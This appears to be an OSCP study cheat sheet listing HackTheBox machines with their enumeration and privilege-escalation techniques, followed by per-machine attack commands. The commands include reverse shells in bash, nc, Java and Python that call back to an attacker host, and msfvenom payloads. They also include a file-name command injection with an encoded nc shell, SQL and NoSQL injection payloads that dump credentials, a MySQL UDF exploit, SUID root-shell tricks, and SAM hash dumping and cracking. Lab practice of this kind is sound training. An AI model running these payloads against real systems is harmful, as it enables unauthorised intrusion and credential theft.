Forest, Active, Cascade, Monteverde, Reel, Mantis, Blackfield, Search, APT, Support, Outdated, Scrambled, StreamIO, Rebound, Manager
https://twitter.com/hackthebox_eu/status/1529122562038456320?cxt=HHwWgICzhcu3xLgqAAAA
https://github.com/tedchen0001/OSCP-Notes/blob/master/AD.md
| Machine | Enumeration | Privilege Escalation |
|---|---|---|
| Admirer | web dir enum, Adminer MySQL (local) | sudo list SETENV, hijacking a Python library via PYTHONPATH |
| Armageddon | Drupal (CVE-2018-7600), credential in config file, MySQL | sudo list, snap |
| Backdoor | WordPress, LFI, /proc, gdbserver | screen |
| *BackendTwo | API scanning, create user, analyse and modify code, auth.log | sudo list, .so file |
| Blocky | dirb, javadecompilers, WordPress | sudo list |
| Blunder | feroxbuster (extensions txt), Bludit | sudo versions before 1.8.28 |
| Brainfuck | WordPress plugin, SMTP, POP3 | cryptography |
| Cronos | subdomain (wfuzz) | crontab |
| Doctor | SSTI payloads | Splunk |
| Forge | SSRF, subdomain, FTP | sudo list, Python debugger (pdb) |
| Frolic | playSMS, Ook! | BOF |
| Haircut | dirb medium.txt, writeable uploads folder | unknown SUID binary (screen) |
| Horizontall | wfuzz top1million-110000, Strapi | active port 8000 (local CVE), SSH tunnel |
| Irked | irc-unrealircd-backdoor | LinPEAS, unknown SUID binary |
| *Jarvis | SQLi, phpMyAdmin 4.8 RCE | Python command injection & systemctl binary |
| Knife | Firefox Wappalyzer, PHP 8.1.0 | upgrade shell & sudo list |
| Lame | distccd | nmap |
| *Luanne | nmap, Supervisor & robots.txt (weather) | BSD doas & netpgp backup file |
| Magic | SQLi login bypass & file upload bypass (PHP getimagesize()) | mysqldump & unknown SUID binary (sysinfo) |
| *Mango | certificate subdomains & enumerate credentials via NoSQL injection (*not sure if you can use this script in the exam), password reuse | jjs, write root SSH public key |
| Meta | subdomain, ExifTool, python3 reverse shell, process, mogrify (ImageMagick) | sudo list, env_keep, Neofetch |
| Mirai | nmap, pi.hole, SSH | sudo list, mount, strings |
| MonitorsTwo | Cacti, #InfoLeakScript, MySQL, SSH | Docker, CVE-2021-41091 |
| Networked | file upload bypass (PHP getimagesize()), PHP command injection | *sudo list |
| Nibbles | page source, directory | sudo list |
| *Nineveh | brute force attack http & https, phpLiteAdmin | crontab, chkrootkit |
| Noter | Flask cookie (flask-unsign), FTP credentials, md-to-pdf package, CVE-2021-23639 | MySQL UDF |
| OpenAdmin | OpenNetAdmin, password in conf file & reverse proxy, cracking passphrase | sudo list, GTFOBins |
| OpenSource | Flask debugger PIN, Gitea, .git hidden information | process, git commit |
| *Ophiuchi | Java deserialization, SnakeYAML | sudo list, analysis of Go code |
| Passage | CutePHP & password storage location & base64 & cracking | *SUID, dbus |
| *Pit | SNMP enum, hidden web folder, SeedDMS | NET-SNMP-EXTEND-MIB, monitoring |
| *Poison | LFI, FreeBSD Apache log poisoning | password base64, vncviewer |
| Popcorn | torrent, upload bypass | user cache, motd, Linux PAM |
| Postman | Redis, SSH, john | Webmin |
| Precious | pdfkit, Ruby, plaintext password | sudo list, *YAML deserialization |
| Previse | HTTP 302, PHP exec, MySQL, hashcat 500 | sudo list, $PATH variable |
| Ready | GitLab | *escaping Docker (mounting-disk-poc2), SSH |
| *RedPanda | SSTI payload ($→*, selection expressions), msfvenom (wget) | jar (pspy process), XML, XXE, SSH |
| ScriptKiddie | *APK (no need for msfvenom, but be careful choosing the payload), shell script, command injection (cut) | sudo list |
| Seal | manager, *403 fuzz, 401, credential in commit history, opt, symbolic link, SSH | sudo list |
| Sense | feroxbuster (extensions txt, medium.txt), pfSense RCE | no need |
| *Shared | cookie-based SQL injection, user table, SSH, IPython CVE-2022-21699 | Redis |
| Shibboleth | wfuzz, UDP, IPMI, hashcat 7300, Zabbix RCE, password reuse | MariaDB |
| Shocker | Shellshock, 403 permission directory, extensions sh pl | sudo list |
| Shoppy | NoSQL injection, subdomain (bitquark list), SSH | sudo list, cat and analyse script, docker group |
| SneakyMailer | subdomain (wfuzz), *credential phishing (email, nc), FTP, *PyPI malicious package | sudo list |
| SolidState | Apache James 2.3.2, *reset user password, POP3, triggered by SSH login | task, file permission |
| Squashed | NFS, mount permission, change userid, web folder | MIT-MAGIC-COOKIE-1, Xauthority |
| Sunday | finger enum users, SSH, backup folder, hashcat 7400 | sudo list (wget) |
| SwagShop | Magento CVE-2015-1397 | sudo list (vi) |
| Tabby | LFI, tomcat-users.xml, page source, remote deploy, file password | lxd |
| TartarSauce | web dir enum, WordPress plugins, CVE-2015-8351 (plugin real version), sudo list (tar) | *backuperer.service (system timers) |
| Time | *Jackson (CVE-2019-12384), Java deserialization | timer_backup.service (system timers) |
| Traverxec | Nostromo, HOMEDIRS (www_public), hidden folder in the user's home, cracking passphrase (e.g., OpenAdmin box) | /etc/sudoers, journalctl without a pipe, resize (e.g., less, vi) |
| Trick | reverse DNS lookup, another subdomain, SQLi, default Nginx sites-available configuration file, LFI, SSH key | fail2ban (group permission) |
| UpDown | *web dir enum, .git directory, subdomain, .htaccess (Required-Header), proc_open (PHP), PHP phar, Python command injection | sudo list |
| Valentine | web dir enum, Heartbleed PoC, decrypt RSA private key | tmux |
| *Writer | web dir enum, SQL injection LOAD_FILE with LFI list, Python source code analysis (`__init__.py`), Django hash | postfix (disclaimer), apt-get update process |

(*): review before the exam
| Machine | Enumeration | Privilege Escalation | AD |
|---|---|---|---|
| Active | Groups.xml | Kerberoasting | ✅ |
| *APT | MS-RPC port 135, IOXID resolver, IPv6, share file, AD database file, dump hashes, valid usernames, modify registry | Responder, NTLMv1 hash | ✅ |
| Arctic | Adobe ColdFusion 8 | MS10-059 (wait for the exploit to take effect) | |
| Atom | SMB, PDF, unzip exe file, autoUpdater, electron-updater, YAML | PortableKanban | |
| *Bankrobber | XSS, SQLi, arbitrary file read | forwarding service, BOF | |
| Bastard | Drupal 7 CVE-2018-7600 | MS10-059, MS15-051 | |
| Bastion | mount VHD, SYSTEM and SAM user hash | mRemoteNG | |
| Blue | MS17-010 | no need | |
| Bounty | file upload bypass, web.config | SeImpersonatePrivilege | |
| Buff | | | |
| Cascade | LDAP hidden information, SMB share, VNC password, user share DB file | AD Recycle Bin | ✅ |
| Chatterbox | Achat | AutoLogon credentials, password reuse, PowerShell reverse shell (with credential) | |
| Conceal | SNMP, *IPsec VPN, FTP (IIS folder), Classic ASP | SeImpersonatePrivilege | |
| Devel | FTP, IIS folder | SeImpersonatePrivilege | |
| Forest | | | |
| Fuse | username (from website), create password (cewl --with-numbers), smbpasswd, enumprinters (rpcclient) | SeLoadDriverPrivilege, Zerologon | ✅ |
| Grandpa | Windows Server 2003, IIS WebDAV CVE-2017-7269 | WMI Service Isolation privilege escalation (churrasco) | |
| Granny | Windows Server 2003, IIS WebDAV CVE-2017-7269 | WMI Service Isolation privilege escalation (churrasco) | |
| *Intelligence | username (PDF creator), add AD-integrated DNS records | group ReadGMSAPassword | ✅ |
| Jerry | Tomcat default credential, deploy | no need | |
| Legacy | MS08-067, MS17-010 | no need | |
| Love | SSRF, Gopher, MySQL | AlwaysInstallElevated | |
| Object | | | |
| Omni | IoT exploit | *SAM and SYSTEM hash, Export-Clixml, GetNetworkCredential | |
| Optimum | HttpFileServer 2.3 | MS16-098 | |
| Outdated | CVE-2022-30190 (PDF), AddKeyCredentialLink (BloodHound, Evil-WinRM) | WSUS | ✅ |
| Reel | sendemail, RTF, HTA | | |
| Remote | NFS service (default port 2049), mount, sdf, Umbraco CMS | SeImpersonatePrivilege, TeamViewer | |
| *Resolute | RPC enumeration, password spray, hidden folder, scripts | DNSAdmins | ✅ |
| *Scrambled | website leaks information (user and password), ticket, SPN, ticketer.py (500 Administrator), SQL query for user info, xp_cmdshell, PowerShell run as a different user | DLL (.NET decompiler), .NET object deserialization | ✅ |
| *Search | enumerate usernames (website image leaks info), Kerberoast, unzip xlsx | pfx, web dir, GMSA user, GenericAll | ✅ |
| SecNotes | CSRF reset password link, SMB, IIS PHP | WinPEAS, Linux shells/distributions | |
| Servmon | FTP, NVMS LFI, SSH | NSClient, *SSH tunnel (localhost services) | |
| Silo | Oracle (default port 1521), CVE-2012-1675, ODAT, brute force | Oracle, SYSTEM privilege | |
| *StreamIO | subdomain, SQLi, wfuzz (parameter, cookie), LFI (php://filter), page uses eval | forwarding service, SQL Server 1433, Firefox credentials, BloodHound analysis, Add-DomainObjectAcl (add member to group), ReadLAPSPassword | ✅ |
| Support | disassemble (.NET), LDAP, user information | DACL abuse, GenericAll | ✅ |
| Worker | SVN (default port 3690), revision, Azure DevOps, new branch, additional drives, evil-winrm | Azure DevOps, PowerShell task | |

(*): review before the exam
Used in Admirer
```bash
sudo PYTHONPATH=/tmp/ <full path of a script file>
```
Used in Knife
```bash
# upgrade shell
/bin/bash -c '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'
```
Used in Luanne
```bash
# authenticate
curl -s http://127.0.0.1:3001/<folder>/ -u <user>:<password>
# find the open ports
netstat -punta || ss -nltpu || netstat -anv
```
Used in Magic
```bash
# image file upload bypass: embed the PHP in the JPEG comment field
# (the PHP array key is double-quoted so it does not terminate the shell's single-quoted string)
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' file.jpg
# dump MySQL database data without using the mysql client tool
mysqldump -u root -p database_name > database_name.sql
```
Used in Mango
```
# NoSQL injection: basic authentication bypass (change the POST data)
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
```
Used in Mirai
```bash
# check partition
strings /dev/sdb
```
Used in Networked
```bash
# command injection via the file name
# method 1: valid file name
echo "" > "; nc -c bash 192.168.0.1 4444 ;"
# method 2: base64-encode the command to avoid the file name check
echo nc -e /bin/bash 192.168.0.1 4444 | base64 -w0
echo "" > "a; echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMC4xIDQ0NDQK | base64 -d | sh; b"
```
base64 options (from `base64 --help`):
```
-w, --wrap=COLS
Wrap encoded lines after COLS character (default 76). Use 0 to disable line wrapping.
-d, --decode
Decode data.
-i, --ignore-garbage
When decoding, ignore non-alphabet characters.
--help
display this help and exit
--version
output version information and exit
```
Used in Nineveh
```bash
# check information in an image file
strings -n 20 <image file>
# extract known file types
binwalk <image file>
binwalk -e <image file>
```
Used in OpenAdmin
```bash
# find files containing specific text, e.g. password
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
# crack an SSH private key passphrase
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt
```
Used in Ophiuchi
```java
// one-line reverse shell command in Java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);
```
Used in Pit
```bash
# crack SNMP community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt -p <target port> <target ip>
snmpwalk -v1 -c public <target ip> .
# -v 1|2c|3  SNMP version
# -c         community string, like a password
# .          [OID]
# get file access control lists
getfacl /usr/local/monitoring
```
Used in Tabby
```bash
# create reverse shell
msfvenom -p java/shell_reverse_tcp lhost=<attacker ip> lport=<attacker port> -f war -o shell.war
# Tomcat roles admin, manager and manager-script can deploy remotely
curl -v -u 'tomcat:<password>' --upload-file shell.war "http://<target ip>:<port>/manager/text/deploy?path=/test&update=true"
# trigger
curl http://<target ip>:<port>/test/
# crack zip file password
zip2john <file> > hash
john --wordlist=<password_list> hash
```
Used in TartarSauce
```bash
wpscan --url http://<target ip>/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token: display vulnerability data (not always necessary); register a user and get the API key from the WPScan official website
```
Used in Time
```bash
# privilege escalation by using the task script
echo 'cp /bin/sh /tmp/sh;chmod u+s /tmp/sh' > <task script file>
# execute
/tmp/sh -p
# -p: privileged mode (keep the effective uid)
```
Used in Valentine
```bash
# check Heartbleed vulnerability with the Nmap NSE script
nmap --script=ssl-heartbleed -p <target port> <target ip>
# ssh-rsa is turned off by default
# error: sign_and_send_pubkey: no mutual signature supported
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa <user>@<target ip> -i <private_key>
# hijacking tmux sessions for privilege escalation
/usr/bin/tmux -S /.devs/dev_sess
```
Used in APT
```bash
# port 135 MSRPC: mappings of RPC
python3 rpcdump.py <target ip> -p 135
# enumerating network interfaces, Windows DCOM version 5.6
python3 IOXIDResolver.py <target ip>
# Nmap IPv6 scan
nmap -6 -p- --min-rate 1000 <target IPv6 address>
# enumerating information from Samba systems
python3 enum4linux-ng.py -A -C <target IPv6 address>
# list all files from all readable shares
crackmapexec smb <target IPv6 address> -u '' -p '' -M spider_plus
```
Used in Bankrobber
```sql
/* load file */
x' UNION SELECT 1, LOAD_FILE('C:\Windows\System32\drivers\etc\hosts'),3-- -
```
Used in Bastion
```bash
sudo mkdir /mnt/bastion
sudo mount -t cifs -o username=NULL //<target ip>/Backups/WindowsImageBackup /mnt/bastion -o rw
mkdir /tmp/vhd
guestmount --add "/mnt/bastion/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /tmp/vhd -v
cd /tmp/vhd/Windows/System32/config/
# use the two files SYSTEM and SAM to dump the hashes
samdump2 SYSTEM SAM > /tmp/hashes.txt
# if the hashes exported by samdump2 seem unusual
python3 secretsdump.py -system SYSTEM -sam SAM LOCAL
# crack user password hash
hashcat -m 1000 user_hash.txt <password_list.txt>
```
Used in Chatterbox
```bat
REM create payload
msfvenom -p windows/shell_reverse_tcp lhost=<attacker ip> lport=<attacker listening port> -f exe > rev.exe
REM change user, password and payload (the payload path is single-quoted so it does not break the outer double-quoted command)
powershell -c "$password = ConvertTo-SecureString '<password>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<user>', $password); Start-Process -FilePath '<payload>' -Credential $creds"
```
Used in Conceal
```bash
sudo ipsec restart
```
Used in Grandpa
```bat
churrasco.exe "nc.exe -e cmd.exe <attacker ip> <attacker port>"
```
Used in Jerry
https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
Used in Legacy
https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
```bash
# attacker
# Windows XP SP3 English (NX) = 6
python2 ms08-067.py <target ip> 6 <target port>
python2 smbserver.py <shareName> /usr/share/windows-resources/binaries/
```
```bat
REM target
copy \\<attacker ip>\<shareName>\whoami.exe C:\windows\temp
```
Used in Love
SSRF payload
https://github.com/tarunkant/Gopherus
```sql
select '<?php system($_GET[\'cmd\']); ?>' INTO OUTFILE 'C:\\xampp\\htdocs\\omrs\\admin\\test.php';
```
```bat
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f msi -o reverse.msi
msiexec /quiet /qn /i <payload>
```
Used in Omni
```bash
python SirepRAT.py <target ip> LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c Powershell Invoke-WebRequest -OutFile C:\Data\Users\DefaultAccount\Documents\nc64.exe -Uri http://<attacker ip>/nc64.exe "
```
Used in Remote
```bash
# NFS service
showmount -e <target ip>
mkdir /tmp/test_folder
sudo mount -t nfs <target ip>:/<folder> /tmp/test_folder -o nolock
```
Used in Silo
ODAT(Oracle Database Attacking Tool)
```bash
# search for valid SIDs
python3 odat.py sidguesser -s <target ip> --sids-file=./resources/sids.txt
# use the default list (accounts/accounts.txt) for a brute-force attack
python3 odat.py passwordguesser -s <target ip> -d <sid> -vvv
# upload reverse shell payload
python3 odat.py utlfile -s <target ip> -p <target port> -U <username> -P <password> -d <sid> --sysdba --putFile c:/ shell-x64.exe /tmp/shell-x64.exe
# execute reverse shell payload
python3 odat.py externaltable -s <target ip> -p <target port> -U <username> -P <password> -d <sid> --sysdba --exec c:/ shell-x64.exe
```
Used in Scrambled
```bash
python3 getTGT.py scrm.local/ksimpson:ksimpson -k -dc-ip 10.10.11.168
export KRB5CCNAME=ksimpson.ccache
klist
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -k -request
# -k  use Kerberos authentication
```
```powershell
# host machine
.\hashcat.exe -m 13100 .\hash .\rockyou.txt
```
Used in StreamIO
```sql
/* testing: the order of the movie list is different */
';--
/* check version */
' UNION SELECT 1, (SELECT @@VERSION), 3, '4', '5', '6';--
/* show all databases, version >= SQL Server 2017 */
' UNION SELECT 1, (SELECT STRING_AGG(name, ',') FROM sys.sysdatabases), 3, '4', '5', '6' ;--
/* show all databases, version < SQL Server 2017 */
' UNION SELECT 1,(STUFF((SELECT ',' + name FROM sys.sysdatabases FOR XML PATH('')), 1, 1, '')), 3, '4', '5', '6';--
/* show all tables */
' UNION SELECT 1, (SELECT STRING_AGG(TABLE_NAME, ',') FROM STREAMIO.INFORMATION_SCHEMA.TABLES), 3, '4', '5', '6';--
/* show all columns */
' UNION SELECT 1, (SELECT STRING_AGG(COLUMN_NAME, ',') FROM STREAMIO.INFORMATION_SCHEMA.COLUMNS), 3, '4', '5', '6';--
/* get the usernames and passwords */
' UNION SELECT 1, (SELECT STRING_AGG(username, ',') + STRING_AGG(password, ',') FROM STREAMIO.dbo.users), 3, '4', '5', '6';--
```
```bash
# find parameter
wfuzz -H 'Cookie: PHPSESSID=<PHPSESSID>' -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw <value>
```
Used in Trick
```bash
dig axfr @<target ip> <domain>
```
Used in Shoppy
NoSQL injection payload (query found in /home/jaeger/ShoppyApp/index.js)
```
admin' || '1==1
```
```bash
# DNS list
wfuzz -H 'Host: FUZZ.shoppy.htb' -u http://shoppy.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hw 11
```
Used in Writer
```bash
wfuzz -z file,/tmp/file_inclusion_linux.txt -d "uname=admin' union select 1,LOAD_FILE('FUZZ'),3,4,5,6; -- -&password=1234" --hw 89 http://writer.htb/administrative
```
Used in Noter
```bash
# fix "cannot import name 'json' from 'itsdangerous'"
pip install Flask==2.0.1
# If the generated cookie does not work, note the system time in the VM.
# decode cookie
flask-unsign --decode --cookie "<cookie>"
# brute-force the secret key
flask-unsign --unsign --cookie "<cookie>" --wordlist ~/Documents/rockyou.txt --no-literal-eval
# create session
flask-unsign --sign --cookie "{'logged_in': True, 'username': '<username>'}" --secret <keystring>
```
MySQL UDF
```bash
# attacker pc
wget http://0xdeadbeef.info/exploits/raptor_udf2.c
# target host
cd /tmp
wget http://<attacker ip>:<attacker port>/raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
```
```sql
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
# show plugin folder path
show variables like '%plugin%';
# change plugin path
# e.g., select * from foo into dumpfile "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so";
select * from foo into dumpfile "<plugin folder path>/raptor_udf2.so";
create function do_system returns integer soname 'raptor_udf2.so';
# check loading
select * from mysql.func;
# change the reverse shell command (doubled single quotes are the SQL escape for a literal quote)
select do_system('echo ''/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh');
```
Used in Armageddon
```bash
# In a web shell (non-tty shell) we need to run a single query from the command line.
mysql -u "<username>" -h "localhost" -p"<password>" "<database>" -e "<sql command>"
```
Used in BackendTwo
for API testing
https://github.com/assetnote/kiterunner
```bash
./kr scan http://<target ip>/api/ -w ~/Documents/routes-large.kite -x 20
# <email> is a placeholder for the signup address
curl -X POST -v 'http://10.10.11.162/api/v1/user/signup' --header 'content-type: application/json' -d '{"email":"<email>","password":"1234"}' | jq .
curl -X POST -v 'http://10.10.11.162/api/v1/user/login' -d 'username=<email>&password=1234'
```
- SSRF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
```
http://0000::1:80/
```
Used in Precious
YAML Deserialization
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
Used in Search
```bash
crackpkcs12 -d ~/Documents/rockyou.txt staff.pfx
```
Used in Meta
```python
#!/usr/bin/python3
# Reverse shell: connect back, then point stdin/stdout/stderr at the socket
# and hand the connection to an interactive bash.
from os import dup2
from subprocess import run
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.14", 4444))  # attacker ip and port
dup2(s.fileno(), 0)  # stdin
dup2(s.fileno(), 1)  # stdout
dup2(s.fileno(), 2)  # stderr
run(["/bin/bash", "-i"])
```
Used in Zipping
(It's not a necessity, but we can still learn about new concepts.)
```bash
# store a symlink (not its target) inside the archive
ln -s ../../../../../../../etc/passwd test.pdf
zip --symlinks test.zip test.pdf
```